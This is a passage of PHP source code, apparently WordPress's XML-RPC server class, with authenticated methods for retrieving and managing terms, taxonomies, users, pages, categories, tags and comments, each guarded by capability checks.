* @type int $4 Term ID.
* }
* @return array|IXR_Error IXR_Error on failure, array on success, containing:
* - 'term_id'
* - 'name'
* - 'slug'
* - 'term_group'
* - 'term_taxonomy_id'
* - 'taxonomy'
* - 'description'
* - 'parent'
* - 'count'
*/
public function wp_getTerm( $args ) {
if ( ! $this->minimum_args( $args, 5 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$taxonomy = $args[3];
$term_id = (int) $args[4];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getTerm', $args, $this );
if ( ! taxonomy_exists( $taxonomy ) ) {
return new IXR_Error( 403, __( 'Invalid taxonomy.' ) );
}
$taxonomy = get_taxonomy( $taxonomy );
$term = get_term( $term_id, $taxonomy->name, ARRAY_A );
if ( is_wp_error( $term ) ) {
return new IXR_Error( 500, $term->get_error_message() );
}
if ( ! $term ) {
return new IXR_Error( 404, __( 'Invalid term ID.' ) );
}
if ( ! current_user_can( 'assign_term', $term_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to assign this term.' ) );
}
return $this->_prepare_term( $term );
}
/**
* Retrieves all terms for a taxonomy.
*
* @since 3.4.0
*
* The optional $filter parameter modifies the query used to retrieve terms.
* Accepted keys are 'number', 'offset', 'orderby', 'order', 'hide_empty', and 'search'.
*
* @see get_terms()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type string $3 Taxonomy name.
* @type array $4 Optional. Modifies the query used to retrieve posts. Accepts 'number',
* 'offset', 'orderby', 'order', 'hide_empty', and 'search'. Default empty array.
* }
* @return array|IXR_Error An associative array of terms data on success, IXR_Error instance otherwise.
*/
public function wp_getTerms( $args ) {
if ( ! $this->minimum_args( $args, 4 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$taxonomy = $args[3];
$filter = isset( $args[4] ) ? $args[4] : array();
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getTerms', $args, $this );
if ( ! taxonomy_exists( $taxonomy ) ) {
return new IXR_Error( 403, __( 'Invalid taxonomy.' ) );
}
$taxonomy = get_taxonomy( $taxonomy );
if ( ! current_user_can( $taxonomy->cap->assign_terms ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to assign terms in this taxonomy.' ) );
}
$query = array( 'taxonomy' => $taxonomy->name );
if ( isset( $filter['number'] ) ) {
$query['number'] = absint( $filter['number'] );
}
if ( isset( $filter['offset'] ) ) {
$query['offset'] = absint( $filter['offset'] );
}
if ( isset( $filter['orderby'] ) ) {
$query['orderby'] = $filter['orderby'];
if ( isset( $filter['order'] ) ) {
$query['order'] = $filter['order'];
}
}
if ( isset( $filter['hide_empty'] ) ) {
$query['hide_empty'] = $filter['hide_empty'];
} else {
$query['get'] = 'all';
}
if ( isset( $filter['search'] ) ) {
$query['search'] = $filter['search'];
}
$terms = get_terms( $query );
if ( is_wp_error( $terms ) ) {
return new IXR_Error( 500, $terms->get_error_message() );
}
$struct = array();
foreach ( $terms as $term ) {
$struct[] = $this->_prepare_term( $term );
}
return $struct;
}
/**
* Retrieves a taxonomy.
*
* @since 3.4.0
*
* @see get_taxonomy()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type string $3 Taxonomy name.
* @type array $4 Optional. Array of taxonomy fields to limit to in the return.
* Accepts 'labels', 'cap', 'menu', and 'object_type'.
* Default empty array.
* }
* @return array|IXR_Error An array of taxonomy data on success, IXR_Error instance otherwise.
*/
public function wp_getTaxonomy( $args ) {
if ( ! $this->minimum_args( $args, 4 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$taxonomy = $args[3];
if ( isset( $args[4] ) ) {
$fields = $args[4];
} else {
/**
* Filters the default taxonomy query fields used by the given XML-RPC method.
*
* @since 3.4.0
*
* @param array $fields An array of taxonomy fields to retrieve. By default,
* contains 'labels', 'cap', and 'object_type'.
* @param string $method The method name.
*/
$fields = apply_filters( 'xmlrpc_default_taxonomy_fields', array( 'labels', 'cap', 'object_type' ), 'wp.getTaxonomy' );
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getTaxonomy', $args, $this );
if ( ! taxonomy_exists( $taxonomy ) ) {
return new IXR_Error( 403, __( 'Invalid taxonomy.' ) );
}
$taxonomy = get_taxonomy( $taxonomy );
if ( ! current_user_can( $taxonomy->cap->assign_terms ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to assign terms in this taxonomy.' ) );
}
return $this->_prepare_taxonomy( $taxonomy, $fields );
}
/**
* Retrieves all taxonomies.
*
* @since 3.4.0
*
* @see get_taxonomies()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Optional. An array of arguments for retrieving taxonomies.
* @type array $4 Optional. The subset of taxonomy fields to return.
* }
* @return array|IXR_Error An associative array of taxonomy data with returned fields determined
* by `$fields`, or an IXR_Error instance on failure.
*/
public function wp_getTaxonomies( $args ) {
if ( ! $this->minimum_args( $args, 3 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$filter = isset( $args[3] ) ? $args[3] : array( 'public' => true );
if ( isset( $args[4] ) ) {
$fields = $args[4];
} else {
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
$fields = apply_filters( 'xmlrpc_default_taxonomy_fields', array( 'labels', 'cap', 'object_type' ), 'wp.getTaxonomies' );
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getTaxonomies', $args, $this );
$taxonomies = get_taxonomies( $filter, 'objects' );
// Holds all the taxonomy data.
$struct = array();
foreach ( $taxonomies as $taxonomy ) {
// Capability check for post types.
if ( ! current_user_can( $taxonomy->cap->assign_terms ) ) {
continue;
}
$struct[] = $this->_prepare_taxonomy( $taxonomy, $fields );
}
return $struct;
}
/**
* Retrieves a user.
*
* The optional $fields parameter specifies what fields will be included
* in the response array. This should be a list of field names. 'user_id' will
* always be included in the response regardless of the value of $fields.
*
* Instead of, or in addition to, individual field names, conceptual group
* names can be used to specify multiple fields. The available conceptual
* groups are 'basic' and 'all'.
*
* @uses get_userdata()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 User ID.
* @type array $4 Optional. Array of fields to return.
* }
* @return array|IXR_Error Array contains (based on $fields parameter):
* - 'user_id'
* - 'username'
* - 'first_name'
* - 'last_name'
* - 'registered'
* - 'bio'
* - 'email'
* - 'nickname'
* - 'nicename'
* - 'url'
* - 'display_name'
* - 'roles'
*/
public function wp_getUser( $args ) {
if ( ! $this->minimum_args( $args, 4 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user_id = (int) $args[3];
if ( isset( $args[4] ) ) {
$fields = $args[4];
} else {
/**
* Filters the default user query fields used by the given XML-RPC method.
*
* @since 3.5.0
*
* @param array $fields An array of user fields to retrieve. By default, contains 'all'.
* @param string $method The method name.
*/
$fields = apply_filters( 'xmlrpc_default_user_fields', array( 'all' ), 'wp.getUser' );
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getUser', $args, $this );
if ( ! current_user_can( 'edit_user', $user_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this user.' ) );
}
$user_data = get_userdata( $user_id );
if ( ! $user_data ) {
return new IXR_Error( 404, __( 'Invalid user ID.' ) );
}
return $this->_prepare_user( $user_data, $fields );
}
/**
* Retrieves users.
*
* The optional $filter parameter modifies the query used to retrieve users.
* Accepted keys are 'number' (default: 50), 'offset' (default: 0), 'role',
* 'who', 'orderby', and 'order'.
*
* The optional $fields parameter specifies what fields will be included
* in the response array.
*
* @uses get_users()
* @see wp_getUser() for more on $fields and return values
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Optional. Arguments for the user query.
* @type array $4 Optional. Fields to return.
* }
* @return array|IXR_Error users data
*/
public function wp_getUsers( $args ) {
if ( ! $this->minimum_args( $args, 3 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$filter = isset( $args[3] ) ? $args[3] : array();
if ( isset( $args[4] ) ) {
$fields = $args[4];
} else {
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
$fields = apply_filters( 'xmlrpc_default_user_fields', array( 'all' ), 'wp.getUsers' );
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getUsers', $args, $this );
if ( ! current_user_can( 'list_users' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to list users.' ) );
}
$query = array( 'fields' => 'all_with_meta' );
$query['number'] = ( isset( $filter['number'] ) ) ? absint( $filter['number'] ) : 50;
$query['offset'] = ( isset( $filter['offset'] ) ) ? absint( $filter['offset'] ) : 0;
if ( isset( $filter['orderby'] ) ) {
$query['orderby'] = $filter['orderby'];
if ( isset( $filter['order'] ) ) {
$query['order'] = $filter['order'];
}
}
if ( isset( $filter['role'] ) ) {
if ( get_role( $filter['role'] ) === null ) {
return new IXR_Error( 403, __( 'Invalid role.' ) );
}
$query['role'] = $filter['role'];
}
if ( isset( $filter['who'] ) ) {
$query['who'] = $filter['who'];
}
$users = get_users( $query );
$_users = array();
foreach ( $users as $user_data ) {
if ( current_user_can( 'edit_user', $user_data->ID ) ) {
$_users[] = $this->_prepare_user( $user_data, $fields );
}
}
return $_users;
}
/**
* Retrieves information about the requesting user.
*
* @uses get_userdata()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username
* @type string $2 Password
* @type array $3 Optional. Fields to return.
* }
* @return array|IXR_Error (@see wp_getUser)
*/
public function wp_getProfile( $args ) {
if ( ! $this->minimum_args( $args, 3 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
if ( isset( $args[3] ) ) {
$fields = $args[3];
} else {
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
$fields = apply_filters( 'xmlrpc_default_user_fields', array( 'all' ), 'wp.getProfile' );
}
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getProfile', $args, $this );
if ( ! current_user_can( 'edit_user', $user->ID ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit your profile.' ) );
}
$user_data = get_userdata( $user->ID );
return $this->_prepare_user( $user_data, $fields );
}
/**
* Edits user's profile.
*
* @uses wp_update_user()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Content struct. It can optionally contain:
* - 'first_name'
* - 'last_name'
* - 'website'
* - 'display_name'
* - 'nickname'
* - 'nicename'
* - 'bio'
* }
* @return true|IXR_Error True, on success.
*/
public function wp_editProfile( $args ) {
if ( ! $this->minimum_args( $args, 4 ) ) {
return $this->error;
}
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$content_struct = $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.editProfile', $args, $this );
if ( ! current_user_can( 'edit_user', $user->ID ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit your profile.' ) );
}
// Holds data of the user.
$user_data = array();
$user_data['ID'] = $user->ID;
// Only set the user details if they were given.
if ( isset( $content_struct['first_name'] ) ) {
$user_data['first_name'] = $content_struct['first_name'];
}
if ( isset( $content_struct['last_name'] ) ) {
$user_data['last_name'] = $content_struct['last_name'];
}
if ( isset( $content_struct['url'] ) ) {
$user_data['user_url'] = $content_struct['url'];
}
if ( isset( $content_struct['display_name'] ) ) {
$user_data['display_name'] = $content_struct['display_name'];
}
if ( isset( $content_struct['nickname'] ) ) {
$user_data['nickname'] = $content_struct['nickname'];
}
if ( isset( $content_struct['nicename'] ) ) {
$user_data['user_nicename'] = $content_struct['nicename'];
}
if ( isset( $content_struct['bio'] ) ) {
$user_data['description'] = $content_struct['bio'];
}
$result = wp_update_user( $user_data );
if ( is_wp_error( $result ) ) {
return new IXR_Error( 500, $result->get_error_message() );
}
if ( ! $result ) {
return new IXR_Error( 500, __( 'Sorry, the user could not be updated.' ) );
}
return true;
}
/**
* Retrieves a page.
*
* @since 2.2.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type int $1 Page ID.
* @type string $2 Username.
* @type string $3 Password.
* }
* @return array|IXR_Error
*/
public function wp_getPage( $args ) {
$this->escape( $args );
$page_id = (int) $args[1];
$username = $args[2];
$password = $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
$page = get_post( $page_id );
if ( ! $page ) {
return new IXR_Error( 404, __( 'Invalid post ID.' ) );
}
if ( ! current_user_can( 'edit_page', $page_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this page.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getPage', $args, $this );
// If we found the page then format the data.
if ( $page->ID && ( 'page' === $page->post_type ) ) {
return $this->_prepare_page( $page );
} else {
// If the page doesn't exist, indicate that.
return new IXR_Error( 404, __( 'Sorry, no such page.' ) );
}
}
/**
* Retrieves Pages.
*
* @since 2.2.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Optional. Number of pages. Default 10.
* }
* @return array|IXR_Error
*/
public function wp_getPages( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$num_pages = isset( $args[3] ) ? (int) $args[3] : 10;
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_pages' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit pages.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getPages', $args, $this );
$pages = get_posts(
array(
'post_type' => 'page',
'post_status' => 'any',
'numberposts' => $num_pages,
)
);
$num_pages = count( $pages );
// If we have pages, put together their info.
if ( $num_pages >= 1 ) {
$pages_struct = array();
foreach ( $pages as $page ) {
if ( current_user_can( 'edit_page', $page->ID ) ) {
$pages_struct[] = $this->_prepare_page( $page );
}
}
return $pages_struct;
}
return array();
}
/**
* Creates a new page.
*
* @since 2.2.0
*
* @see wp_xmlrpc_server::mw_newPost()
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Content struct.
* }
* @return int|IXR_Error
*/
public function wp_newPage( $args ) {
// Items not escaped here will be escaped in wp_newPost().
$username = $this->escape( $args[1] );
$password = $this->escape( $args[2] );
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.newPage', $args, $this );
// Mark this as content for a page.
$args[3]['post_type'] = 'page';
// Let mw_newPost() do all of the heavy lifting.
return $this->mw_newPost( $args );
}
/**
* Deletes a page.
*
* @since 2.2.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Page ID.
* }
* @return true|IXR_Error True, if success.
*/
public function wp_deletePage( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$page_id = (int) $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.deletePage', $args, $this );
/*
* Get the current page based on the 'page_id' and
* make sure it is a page and not a post.
*/
$actual_page = get_post( $page_id, ARRAY_A );
if ( ! $actual_page || ( 'page' !== $actual_page['post_type'] ) ) {
return new IXR_Error( 404, __( 'Sorry, no such page.' ) );
}
// Make sure the user can delete pages.
if ( ! current_user_can( 'delete_page', $page_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to delete this page.' ) );
}
// Attempt to delete the page.
$result = wp_delete_post( $page_id );
if ( ! $result ) {
return new IXR_Error( 500, __( 'Failed to delete the page.' ) );
}
/**
* Fires after a page has been successfully deleted via XML-RPC.
*
* @since 3.4.0
*
* @param int $page_id ID of the deleted page.
* @param array $args An array of arguments to delete the page.
*/
do_action( 'xmlrpc_call_success_wp_deletePage', $page_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
return true;
}
/**
* Edits a page.
*
* @since 2.2.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type int $1 Page ID.
* @type string $2 Username.
* @type string $3 Password.
* @type string $4 Content.
* @type int $5 Publish flag. 0 for draft, 1 for publish.
* }
* @return array|IXR_Error
*/
public function wp_editPage( $args ) {
// Items will be escaped in mw_editPost().
$page_id = (int) $args[1];
$username = $args[2];
$password = $args[3];
$content = $args[4];
$publish = $args[5];
$escaped_username = $this->escape( $username );
$escaped_password = $this->escape( $password );
$user = $this->login( $escaped_username, $escaped_password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.editPage', $args, $this );
// Get the page data and make sure it is a page.
$actual_page = get_post( $page_id, ARRAY_A );
if ( ! $actual_page || ( 'page' !== $actual_page['post_type'] ) ) {
return new IXR_Error( 404, __( 'Sorry, no such page.' ) );
}
// Make sure the user is allowed to edit pages.
if ( ! current_user_can( 'edit_page', $page_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit this page.' ) );
}
// Mark this as content for a page.
$content['post_type'] = 'page';
// Arrange args in the way mw_editPost() understands.
$args = array(
$page_id,
$username,
$password,
$content,
$publish,
);
// Let mw_editPost() do all of the heavy lifting.
return $this->mw_editPost( $args );
}
/**
* Retrieves page list.
*
* @since 2.2.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function wp_getPageList( $args ) {
global $wpdb;
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_pages' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit pages.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getPageList', $args, $this );
// Get list of page IDs and titles.
$page_list = $wpdb->get_results(
"
SELECT ID page_id,
post_title page_title,
post_parent page_parent_id,
post_date_gmt,
post_date,
post_status
FROM {$wpdb->posts}
WHERE post_type = 'page'
ORDER BY ID
"
);
// The date needs to be formatted properly.
$num_pages = count( $page_list );
for ( $i = 0; $i < $num_pages; $i++ ) {
$page_list[ $i ]->dateCreated = $this->_convert_date( $page_list[ $i ]->post_date );
$page_list[ $i ]->date_created_gmt = $this->_convert_date_gmt( $page_list[ $i ]->post_date_gmt, $page_list[ $i ]->post_date );
unset( $page_list[ $i ]->post_date_gmt );
unset( $page_list[ $i ]->post_date );
unset( $page_list[ $i ]->post_status );
}
return $page_list;
}
/**
* Retrieves authors list.
*
* @since 2.2.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function wp_getAuthors( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to edit posts.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getAuthors', $args, $this );
$authors = array();
foreach ( get_users( array( 'fields' => array( 'ID', 'user_login', 'display_name' ) ) ) as $user ) {
$authors[] = array(
'user_id' => $user->ID,
'user_login' => $user->user_login,
'display_name' => $user->display_name,
);
}
return $authors;
}
/**
* Gets the list of all tags.
*
* @since 2.7.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* }
* @return array|IXR_Error
*/
public function wp_getTags( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you must be able to edit posts on this site in order to view tags.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getKeywords', $args, $this );
$tags = array();
$all_tags = get_tags();
if ( $all_tags ) {
foreach ( (array) $all_tags as $tag ) {
$struct = array();
$struct['tag_id'] = $tag->term_id;
$struct['name'] = $tag->name;
$struct['count'] = $tag->count;
$struct['slug'] = $tag->slug;
$struct['html_url'] = esc_html( get_tag_link( $tag->term_id ) );
$struct['rss_url'] = esc_html( get_tag_feed_link( $tag->term_id ) );
$tags[] = $struct;
}
}
return $tags;
}
/**
* Creates a new category.
*
* @since 2.2.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Category.
* }
* @return int|IXR_Error Category ID.
*/
public function wp_newCategory( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$category = $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.newCategory', $args, $this );
// Make sure the user is allowed to add a category.
if ( ! current_user_can( 'manage_categories' ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to add a category.' ) );
}
/*
* If no slug was provided, make it empty
* so that WordPress will generate one.
*/
if ( empty( $category['slug'] ) ) {
$category['slug'] = '';
}
/*
* If no parent_id was provided, make it empty
* so that it will be a top-level page (no parent).
*/
if ( ! isset( $category['parent_id'] ) ) {
$category['parent_id'] = '';
}
// If no description was provided, make it empty.
if ( empty( $category['description'] ) ) {
$category['description'] = '';
}
$new_category = array(
'cat_name' => $category['name'],
'category_nicename' => $category['slug'],
'category_parent' => $category['parent_id'],
'category_description' => $category['description'],
);
$cat_id = wp_insert_category( $new_category, true );
if ( is_wp_error( $cat_id ) ) {
if ( 'term_exists' === $cat_id->get_error_code() ) {
return (int) $cat_id->get_error_data();
} else {
return new IXR_Error( 500, __( 'Sorry, the category could not be created.' ) );
}
} elseif ( ! $cat_id ) {
return new IXR_Error( 500, __( 'Sorry, the category could not be created.' ) );
}
/**
* Fires after a new category has been successfully created via XML-RPC.
*
* @since 3.4.0
*
* @param int $cat_id ID of the new category.
* @param array $args An array of new category arguments.
*/
do_action( 'xmlrpc_call_success_wp_newCategory', $cat_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
return $cat_id;
}
/**
* Deletes a category.
*
* @since 2.5.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Category ID.
* }
* @return bool|IXR_Error See wp_delete_term() for return info.
*/
public function wp_deleteCategory( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$category_id = (int) $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.deleteCategory', $args, $this );
if ( ! current_user_can( 'delete_term', $category_id ) ) {
return new IXR_Error( 401, __( 'Sorry, you are not allowed to delete this category.' ) );
}
$status = wp_delete_term( $category_id, 'category' );
if ( true === $status ) {
/**
* Fires after a category has been successfully deleted via XML-RPC.
*
* @since 3.4.0
*
* @param int $category_id ID of the deleted category.
* @param array $args An array of arguments to delete the category.
*/
do_action( 'xmlrpc_call_success_wp_deleteCategory', $category_id, $args ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.NotLowercase
}
return $status;
}
/**
* Retrieves category list.
*
* @since 2.2.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Category
* @type int $4 Max number of results.
* }
* @return array|IXR_Error
*/
public function wp_suggestCategories( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$category = $args[3];
$max_results = (int) $args[4];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
if ( ! current_user_can( 'edit_posts' ) ) {
return new IXR_Error( 401, __( 'Sorry, you must be able to edit posts on this site in order to view categories.' ) );
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.suggestCategories', $args, $this );
$category_suggestions = array();
$args = array(
'get' => 'all',
'number' => $max_results,
'name__like' => $category,
);
foreach ( (array) get_categories( $args ) as $cat ) {
$category_suggestions[] = array(
'category_id' => $cat->term_id,
'category_name' => $cat->name,
);
}
return $category_suggestions;
}
/**
* Retrieves a comment.
*
* @since 2.7.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type int $3 Comment ID.
* }
* @return array|IXR_Error
*/
public function wp_getComment( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$comment_id = (int) $args[3];
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getComment', $args, $this );
$comment = get_comment( $comment_id );
if ( ! $comment ) {
return new IXR_Error( 404, __( 'Invalid comment ID.' ) );
}
if ( ! current_user_can( 'edit_comment', $comment_id ) ) {
return new IXR_Error( 403, __( 'Sorry, you are not allowed to moderate or edit this comment.' ) );
}
return $this->_prepare_comment( $comment );
}
/**
* Retrieves comments.
*
* Besides the common blog_id (unused), username, and password arguments,
* it takes a filter array as the last argument.
*
* Accepted 'filter' keys are 'status', 'post_id', 'offset', and 'number'.
*
* The defaults are as follows:
* - 'status' - Default is ''. Filter by status (e.g., 'approve', 'hold')
* - 'post_id' - Default is ''. The post where the comment is posted.
* Empty string shows all comments.
* - 'number' - Default is 10. Total number of media items to retrieve.
* - 'offset' - Default is 0. See WP_Query::query() for more.
*
* @since 2.7.0
*
* @param array $args {
* Method arguments. Note: arguments must be ordered as documented.
*
* @type int $0 Blog ID (unused).
* @type string $1 Username.
* @type string $2 Password.
* @type array $3 Optional. Query arguments.
* }
* @return array|IXR_Error Array containing a collection of comments.
* See wp_xmlrpc_server::wp_getComment() for a description
* of each item contents.
*/
public function wp_getComments( $args ) {
$this->escape( $args );
$username = $args[1];
$password = $args[2];
$struct = isset( $args[3] ) ? $args[3] : array();
$user = $this->login( $username, $password );
if ( ! $user ) {
return $this->error;
}
/** This action is documented in wp-includes/class-wp-xmlrpc-server.php */
do_action( 'xmlrpc_call', 'wp.getComments', $args, $this );
if ( isset( $struct['status'] ) ) {
$status = $struct['status'];
} else {
$status = '';
}
if ( ! current_user_can( 'moderate_comments' ) && 'approve' !== $status ) {
return new IXR_Error( 401, __( 'Invalid comment status.' ) );
}
$post_id = '';
if ( isset( $struct['post_id'] ) ) {
$post_id = absint( $struct['post_id'] );
}
$post_type = '';
if ( isset( $struct['post_type'] ) ) {
$post_type_object = get_post_type_object( $struct['post_type'] );
if ( ! $post_type_object || ! post_type_supports( $post_type_object->name, 'comments' ) ) {
return new IXR_Error( 404, __( 'Invalid post type.' ) );
}
$post_type = $struct['post_type'];
}
$offset = 0;
if ( isset( $struct['offset'] ) ) {
$offset = absint( $struct['offset'] );
}
$number = 10;
if ( isset( $struct['number'] ) ) {
$number = absint( $struct['number'] );
}
$comments = get_comments(
array(
'status' => $status,
'post_id' => $post_id,
'offset' => $offset,
'number' => $number,
'post_type' => $post_type,
)
);
$comments_struct = array();
if ( is_array( $comments ) ) {
foreach ( $comments as $comment ) {
$comments_struct[] = $this->_prepare_comment( $comment );
}
}
return $comments_struct;
}
/**
* Deletes a comment.
*
* By default, the comment will be moved to the Trash instead of deleted.
* See wp_delete_comment() for more information on this behavior.
*
* @since 2.7.0
*
* @param array $args {
